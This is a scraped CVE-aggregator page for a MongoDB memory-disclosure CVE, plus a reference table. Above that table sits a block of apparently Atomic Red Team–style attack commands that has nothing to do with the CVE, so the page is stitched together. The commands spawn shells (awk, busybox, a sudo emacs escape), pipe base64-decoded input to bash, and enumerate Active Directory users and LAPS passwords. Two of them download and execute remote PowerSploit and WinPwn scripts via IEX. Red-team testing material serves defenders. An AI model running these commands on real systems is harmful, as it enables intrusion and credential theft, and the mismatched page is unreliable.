bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-14847 |
| jira.mongodb.org |
GitHub CVE
|
https://jira.mongodb.org/browse/SERVER-115508 |
| openwall.com |
NVD API
Mailing List
|
http://www.openwall.com/lists/oss-security/2025/12/29/21 |
| smartkeyss.com |
NVD API
Technical Description
Third Party Advisory
|
https://www.smartkeyss.com/post/mongobleed-pre-auth-memory-disclosure-via-op_compressed-in-mongodb-cve-2025-14847 |
| vicarius.io |
NVD API
Exploit
Third Party Advisory
|
https://www.vicarius.io/vsociety/posts/cve-2025-14847-detection-script-heap-memory-exposure-in-mongodb-server |
| vicarius.io |
NVD API
Exploit
Third Party Advisory
|
https://www.vicarius.io/vsociety/posts/cve-2025-14847-mitigation-script-heap-memory-exposure-in-mongodb-server |
| cisa.gov |
NVD API
Third Party Advisory
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-14847 |